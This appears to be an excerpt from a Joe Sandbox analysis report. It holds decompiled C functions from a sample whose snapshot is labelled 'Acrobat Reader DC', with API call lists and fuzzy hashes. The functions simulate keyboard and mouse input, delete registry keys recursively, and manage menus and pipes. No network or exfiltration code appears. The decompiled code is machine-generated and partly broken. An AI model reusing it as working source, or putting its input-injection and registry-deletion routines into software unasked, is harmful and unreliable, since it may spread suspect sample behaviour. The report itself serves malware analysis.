                                  • Opcode ID: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                  • Instruction ID: 735ec6acd85acabf56193826cd071f2489ef818a13be6dc6b3d06c037ab4ab6a
                                  • Opcode Fuzzy Hash: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                  • Instruction Fuzzy Hash: D5E065315822216BD6261B346E4DBCF37A8EB2F752F141827F701D6250CB998445D7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045FA41(void* __ecx, void* __eflags, intOrPtr _a4) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				struct HMENU__* _v56;
                                  				int _v60;
                                  				int _v64;
                                  				intOrPtr _v72;
                                  				int _t42;
                                  				signed int _t44;
                                  				void* _t50;
                                  				signed int _t55;
                                  				struct HMENU__* _t61;
                                  				int _t66;
                                  				signed int* _t68;
                                  				struct HMENU__** _t71;
                                  
                                  				_t50 = __ecx;
                                  				_v60 = 0xffffffff;
                                  				if(E00434179(__ecx, _a4,  &_v60) == 0) {
                                  					L18:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t66 = _v60;
                                  					if(_t66 < 7 || _t66 >  *((intOrPtr*)(_t50 + 0x9d0))) {
                                  						goto L18;
                                  					} else {
                                  						_t71 =  *(_t50 + 0x1b4 + _t66 * 4);
                                  						if(_t71[1] != 1) {
                                  							L16:
                                  							if(DeleteMenu( *_t71, _t66, 0) == 0) {
                                  								goto L18;
                                  							} else {
                                  								 *_t71 = 0;
                                  								_t71[1] = 0xff;
                                  								E0040C600(_t33 | 0xffffffff,  &(_t71[2]), 0);
                                  								E0044422D(_t50, _t66);
                                  								return 1;
                                  							}
                                  						} else {
                                  							_v52.cbSize = 0x30;
                                  							E00412F40( &(_v52.fMask), 0, 0x2c);
                                  							_v52.fMask = 4;
                                  							if(GetMenuItemInfoW( *_t71, _t66, 0,  &_v52) == 0) {
                                  								goto L18;
                                  							} else {
                                  								_t61 = _v52.hSubMenu;
                                  								_t42 = 7;
                                  								_v56 = _t61;
                                  								_v64 = 7;
                                  								if( *((intOrPtr*)(_t50 + 0x9d0)) >= 7) {
                                  									_t18 = _t50 + 0x1d0; // 0x2cf
                                  									_t68 = _t18;
                                  									while(1) {
                                  										_t55 =  *_t68;
                                  										if(_t55 != 0 &&  *_t55 == _t61) {
                                  											_t87 =  *((char*)(_t55 + 4)) - 1;
                                  											if( *((char*)(_t55 + 4)) != 1) {
                                  												DeleteMenu(_t61, _t42, 0);
                                  												 *((char*)( *_t68 + 4)) = 0xff;
                                  												 *( *_t68) = 0;
                                  												_t44 =  *_t68;
                                  												 *((char*)(_t44 + 5)) = 0;
                                  												__eflags = _t44 | 0xffffffff;
                                  												E0040C600(_t44 | 0xffffffff,  *_t68 + 8, 0);
                                  												E0044422D(_t50, _v72);
                                  											} else {
                                  												E0045FA41(_t50, _t87, _t42);
                                  											}
                                  											_t42 = _v64;
                                  										}
                                  										_t42 = _t42 + 1;
                                  										_t68 =  &(_t68[1]);
                                  										_v64 = _t42;
                                  										if(_t42 >  *((intOrPtr*)(_t50 + 0x9d0))) {
                                  											break;
                                  										}
                                  										_t61 = _v56;
                                  									}
                                  									_t66 = _v60;
                                  								}
                                  								goto L16;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

















                                  APIs
                                  • _memset.LIBCMT ref: 0045FAA9
                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$InfoItem_memset
                                  • String ID: 0
                                  • API String ID: 1173514356-4108050209
                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00443442(signed int* _a4, signed int _a8, long _a12, void* _a16, HANDLE* _a20) {
                                  				struct _SECURITY_ATTRIBUTES _v16;
                                  				signed int _t17;
                                  				void* _t18;
                                  				void* _t20;
                                  				void* _t24;
                                  				void* _t27;
                                  				signed int _t28;
                                  				long _t30;
                                  				HANDLE* _t35;
                                  
                                  				_t17 =  *_a4;
                                  				_t30 = _a12;
                                  				_t35 = _a16;
                                  				_v16.nLength = 0xc;
                                  				_v16.bInheritHandle = 0;
                                  				_v16.lpSecurityDescriptor = 0;
                                  				if((_t17 & 0x00000010) == 0) {
                                  					if((_a8 & _t17) == 0) {
                                  						_t18 = GetStdHandle(_t30);
                                  						 *_t35 = _t18;
                                  						if(_t18 == 0 || _t18 == 0xffffffff) {
                                  							_t20 = CreateFileW("nul", 0x40000000, 2,  &_v16, 3, 0x80, 0);
                                  							 *_t35 = _t20;
                                  							if(_t20 == 0xffffffff || _t20 == 0) {
                                  								goto L3;
                                  							} else {
                                  								goto L10;
                                  							}
                                  						} else {
                                  							goto L2;
                                  						}
                                  					} else {
                                  						_t27 =  *_t35;
                                  						if(_t27 == 0) {
                                  							_t28 = CreatePipe(_a20, _t35,  &_v16, 0);
                                  							if(_t28 != 0) {
                                  								L10:
                                  								E004325E0( *_t35,  &_a16, 1);
                                  								E00432614(_t35);
                                  								_t24 = _a16;
                                  								 *_t35 = _t24;
                                  								return _t24;
                                  							} else {
                                  								return _t28 | 0xffffffff;
                                  							}
                                  						} else {
                                  							return _t27;
                                  						}
                                  					}
                                  				} else {
                                  					_t18 = GetStdHandle(_t30);
                                  					 *_t35 = _t18;
                                  					if(_t18 == 0xffffffff) {
                                  						L3:
                                  						 *_t35 = 0;
                                  						return  *_t35;
                                  					} else {
                                  						L2:
                                  						E004325E0(_t18, _t35, 1);
                                  						return  *_t35;
                                  					}
                                  				}
                                  			}













                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044334F(signed char* _a4, void* _a8, HANDLE* _a12) {
                                  				struct _SECURITY_ATTRIBUTES _v16;
                                  				signed char _t15;
                                  				void* _t16;
                                  				void* _t18;
                                  				void* _t22;
                                  				void* _t25;
                                  				signed int _t26;
                                  				HANDLE* _t32;
                                  
                                  				_t15 =  *_a4;
                                  				_t32 = _a8;
                                  				_v16.nLength = 0xc;
                                  				_v16.bInheritHandle = 0;
                                  				_v16.lpSecurityDescriptor = 0;
                                  				if((_t15 & 0x00000010) == 0) {
                                  					if((_t15 & 0x00000001) == 0) {
                                  						_t16 = GetStdHandle(0xfffffff6);
                                  						 *_t32 = _t16;
                                  						if(_t16 == 0 || _t16 == 0xffffffff) {
                                  							_t18 = CreateFileW("nul", 0x80000000, 1,  &_v16, 3, 0x80, 0);
                                  							 *_t32 = _t18;
                                  							if(_t18 == 0xffffffff || _t18 == 0) {
                                  								goto L3;
                                  							} else {
                                  								goto L10;
                                  							}
                                  						} else {
                                  							goto L2;
                                  						}
                                  					} else {
                                  						_t25 =  *_t32;
                                  						if(_t25 == 0) {
                                  							_t26 = CreatePipe(_t32, _a12,  &_v16, 0);
                                  							if(_t26 != 0) {
                                  								L10:
                                  								E004325E0( *_t32,  &_a8, 1);
                                  								E00432614(_t32);
                                  								_t22 = _a8;
                                  								 *_t32 = _t22;
                                  								return _t22;
                                  							} else {
                                  								return _t26 | 0xffffffff;
                                  							}
                                  						} else {
                                  							return _t25;
                                  						}
                                  					}
                                  				} else {
                                  					_t16 = GetStdHandle(0xfffffff6);
                                  					 *_t32 = _t16;
                                  					if(_t16 == 0xffffffff) {
                                  						L3:
                                  						 *_t32 = 0;
                                  						return  *_t32;
                                  					} else {
                                  						L2:
                                  						E004325E0(_t16, _t32, 1);
                                  						return  *_t32;
                                  					}
                                  				}
                                  			}












                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00440C49(intOrPtr _a4, struct HWND__** _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, long _a40) {
                                  				signed int _t13;
                                  				struct HWND__* _t16;
                                  				int _t20;
                                  				WCHAR* _t24;
                                  				intOrPtr _t25;
                                  				intOrPtr _t29;
                                  				struct HWND__** _t37;
                                  
                                  				_t13 = _a36;
                                  				_t29 = _a32;
                                  				_t25 = _a28;
                                  				_t24 = _a16;
                                  				_t37 = _a8;
                                  				if(_t13 != 0xffffffff) {
                                  					if(_t13 < 0x10) {
                                  						goto L13;
                                  					}
                                  				} else {
                                  					_t13 = 2;
                                  					L13:
                                  					_t13 = _t13 | 0x00000002;
                                  				}
                                  				if(_t25 == 0xffffffff) {
                                  					_t25 = 0x96;
                                  				}
                                  				if(_t29 == 0xffffffff) {
                                  					_t29 = 0x96;
                                  				}
                                  				if(_a40 >= 0) {
                                  					if( *_t24 == 0) {
                                  						goto L19;
                                  					} else {
                                  						_t16 = E004301F8(_a4, 0, L"SysAnimate32", 0, _t13, _a20, _a24, _t25, _t29, _a12, 0);
                                  						 *_t37 = _t16;
                                  						if(_t16 == 0) {
                                  							L8:
                                  							return 0;
                                  						} else {
                                  							if(SendMessageW(_t16, 0x467, 0, _t24) != 0) {
                                  								L9:
                                  								if( *0x4a8638 == 0) {
                                  									_t37[0x1f] = 0x300;
                                  								}
                                  								return 1;
                                  							} else {
                                  								_t20 = LoadLibraryW(_t24);
                                  								if(_t20 == 0 || SendMessageW( *_t37, 0x467, _t20, _a40) != 0) {
                                  									goto L9;
                                  								} else {
                                  									DestroyWindow( *_t37);
                                  									goto L8;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					L19:
                                  					return 0;
                                  				}
                                  			}











                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: SysAnimate32
                                  • API String ID: 0-1011021900
                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043333C(intOrPtr _a4) {
                                  				long _t2;
                                  				long _t3;
                                  				void* _t7;
                                  
                                  				_t8 = _a4;
                                  				_t2 = E004114AB(_t7, _a4, L"UP");
                                  				if(_t2 != 0) {
                                  					_t3 = E004114AB(_t7, _t8, L"DOWN");
                                  					if(_t3 != 0) {
                                  						return 0;
                                  					} else {
                                  						mouse_event(0x800, _t3, _t3, 0xffffff88, _t3);
                                  						return 1;
                                  					}
                                  				} else {
                                  					mouse_event(0x800, _t2, _t2, 0x78, _t2);
                                  					return 1;
                                  				}
                                  			}







                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicollmouse_event
                                  • String ID: DOWN
                                  • API String ID: 1033544147-711622031
                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0044C37A(signed char _a4, signed int _a8) {
                                  				short _v16;
                                  				short _v20;
                                  				intOrPtr _v24;
                                  				signed int _v26;
                                  				short _v28;
                                  				char _v32;
                                  				char _v288;
                                  				signed int _t37;
                                  				signed char _t50;
                                  				signed char _t60;
                                  				signed char _t70;
                                  				signed int _t71;
                                  				long _t74;
                                  				void* _t76;
                                  
                                  				_t60 = _a4;
                                  				_t70 = _a8;
                                  				_t37 =  *_t70;
                                  				_t71 =  *(_t70 + 8) & 0x0000ffff;
                                  				_a8 = _t37;
                                  				_a4 =  *((intOrPtr*)(_t70 + 7));
                                  				if( *(_t60 + 0x20) == 0 || _t37 == 0x14 || _t37 == 0x90 || _t37 == 0x91) {
                                  					if(E0043487C(_t70) == 0) {
                                  						_v32 = 1;
                                  						_v28 = 0;
                                  						_v26 = _t71;
                                  						_v24 = 6;
                                  						_v20 = 0;
                                  						_v16 = 0;
                                  						__imp__SendInput(1,  &_v32, 0x1c);
                                  						goto L22;
                                  					} else {
                                  						if(E00444980(_t70) != 1) {
                                  							E0043471D(_t60, _a8, _a4, 2);
                                  							return E004347A9(_t60);
                                  						} else {
                                  							E0043471D(_t60, _a8, _a4, 3);
                                  							return E004347A9(_t60);
                                  						}
                                  					}
                                  				} else {
                                  					if(E0043487C(_t70) == 0) {
                                  						L22:
                                  						return E004347A9(_t60);
                                  					} else {
                                  						if(GetKeyboardState( &_v288) != 0) {
                                  							 *(_t76 + (_a8 & 0x000000ff) - 0x11c) =  *(_t76 + (_a8 & 0x000000ff) - 0x11c) ^ 0x00000080;
                                  							SetKeyboardState( &_v288);
                                  						}
                                  						_t74 = (_a4 & 0x000000ff) << 0x00000010 | 0xc0000001;
                                  						if(E00444980(_t70) == 1) {
                                  							_t74 = _t74 | 0x01000000;
                                  						}
                                  						if( *((char*)(_t60 + 0x17)) != 0 ||  *((char*)(_t60 + 0x1d)) != 0) {
                                  							_t50 = _a8;
                                  							goto L14;
                                  						} else {
                                  							_t50 = _a8;
                                  							if(_t50 == 0x12) {
                                  								L14:
                                  								if( *((char*)(_t60 + 0x16)) != 0 ||  *((char*)(_t60 + 0x1c)) != 0) {
                                  									goto L12;
                                  								} else {
                                  									PostMessageW( *(_t60 + 0x20), 0x105, _t50 & 0x000000ff, _t74 | 0x20000000);
                                  									return E004347A9(_t60);
                                  								}
                                  							} else {
                                  								L12:
                                  								PostMessageW( *(_t60 + 0x20), 0x101, _t50 & 0x000000ff, _t74);
                                  								return E004347A9(_t60);
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}


















                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: KeyboardMessagePostState$InputSend
                                  • String ID:
                                  • API String ID: 3031425849-0
                                  • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                  • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                  • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                  • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00441C7B(void* _a4, signed int _a8) {
                                  				int _v8;
                                  				void* _v12;
                                  				int _v16;
                                  				int _v20;
                                  				char _v28;
                                  				struct _FILETIME _v36;
                                  				short _v548;
                                  				int _t29;
                                  				void* _t33;
                                  				void* _t35;
                                  				long _t36;
                                  				signed int _t57;
                                  				void* _t58;
                                  				void* _t59;
                                  
                                  				_t58 = _a4;
                                  				_v8 = 0xff;
                                  				if(RegEnumKeyExW(_t58, 0,  &_v548,  &_v8, 0, 0, 0,  &_v36) == 0x103) {
                                  					L10:
                                  					return 1;
                                  				} else {
                                  					_t57 = _a8;
                                  					_t29 = _t57 | 0x00020019;
                                  					_v16 = _t29;
                                  					while(RegOpenKeyExW(_t58,  &_v548, 0, _t29,  &_v12) == 0) {
                                  						_t33 = E00441C7B(_v12, _t57);
                                  						_t59 = _t59 + 8;
                                  						RegCloseKey(_v12);
                                  						if(_t33 == 0) {
                                  							break;
                                  						} else {
                                  							_v28 = 0;
                                  							_v20 = 0;
                                  							_t35 = E00430CB1( &_v28);
                                  							_t63 = _t35;
                                  							if(_t35 == 0) {
                                  								_t36 = RegDeleteKeyW(_t58,  &_v548);
                                  							} else {
                                  								_push(0);
                                  								_push(_t57);
                                  								_push( &_v548);
                                  								_push(_t58);
                                  								_t36 =  *((intOrPtr*)(E00441C58(_t63,  &_v28)))();
                                  							}
                                  							if(_t36 != 0) {
                                  								E00430CCB( &_v28);
                                  								break;
                                  							} else {
                                  								E00430CCB( &_v28);
                                  								_v8 = 0xff;
                                  								if(RegEnumKeyExW(_t58, 0,  &_v548,  &_v8, 0, 0, 0,  &_v36) != 0x103) {
                                  									_t29 = _v16;
                                  									continue;
                                  								} else {
                                  									goto L10;
                                  								}
                                  							}
                                  						}
                                  						goto L13;
                                  					}
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  				L13:
                                  			}


















                                  APIs
                                  • RegEnumKeyExW.ADVAPI32 ref: 00441CA9
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                  • RegEnumKeyExW.ADVAPI32 ref: 00441D6E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Enum$CloseDeleteOpen
                                  • String ID:
                                  • API String ID: 2095303065-0
                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 66%
                                  			E00436A0B(struct HWND__** _a4, intOrPtr _a8, intOrPtr _a12, int _a16, int _a20) {
                                  				struct tagRECT _v20;
                                  				intOrPtr _t28;
                                  				struct HWND__* _t33;
                                  				intOrPtr _t37;
                                  				int _t47;
                                  				intOrPtr _t51;
                                  				int _t52;
                                  				struct HWND__* _t54;
                                  				signed short _t57;
                                  				intOrPtr _t58;
                                  				signed short _t63;
                                  				long _t66;
                                  
                                  				_t54 =  *_a4;
                                  				_t63 = _a20;
                                  				_t57 = _a16;
                                  				GetWindowRect(_t54,  &_v20);
                                  				if(_t57 == 0xffffffff) {
                                  					asm("cdq");
                                  					_t57 = _v20.right - _v20.left - _t54 >> 1;
                                  				}
                                  				if(_t63 == 0xffffffff) {
                                  					asm("cdq");
                                  					_t63 = _v20.bottom - _v20.top - _t54 >> 1;
                                  				}
                                  				_t66 = (_t63 & 0x0000ffff) << 0x00000010 | _t57 & 0x0000ffff;
                                  				_t28 = _a8;
                                  				_t51 = 1;
                                  				_a16 = 0x201;
                                  				_a20 = 0x203;
                                  				_t47 = 0x202;
                                  				_t58 = 1;
                                  				if(_t28 != 2) {
                                  					if(_t28 == 1) {
                                  						_a16 = 0x207;
                                  						_t47 = 0x208;
                                  						_t58 = 0x10;
                                  						goto L8;
                                  					}
                                  				} else {
                                  					_a16 = 0x204;
                                  					_t47 = 0x205;
                                  					_t58 = _t28;
                                  					L8:
                                  					_a20 = 0x206;
                                  				}
                                  				_a8 = _t51;
                                  				if(_a12 >= _t51) {
                                  					while(1) {
                                  						asm("cdq");
                                  						_push(_t66);
                                  						_t33 =  *_a4;
                                  						_push(_t58);
                                  						if((_t51 - _t54 >> 1) + (_t51 - _t54 >> 1) != _t51) {
                                  							_t52 = _a16;
                                  						} else {
                                  							_t52 = _a20;
                                  						}
                                  						PostMessageW(_t33, _t52, ??, ??);
                                  						Sleep(0);
                                  						_t54 =  *_a4;
                                  						PostMessageW(_t54, _t47, 0, _t66);
                                  						Sleep(0);
                                  						_t37 = _a8 + 1;
                                  						_a8 = _t37;
                                  						if(_t37 > _a12) {
                                  							break;
                                  						}
                                  						_t51 = _a8;
                                  					}
                                  					return 1;
                                  				} else {
                                  					return _t51;
                                  				}
                                  			}
















                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
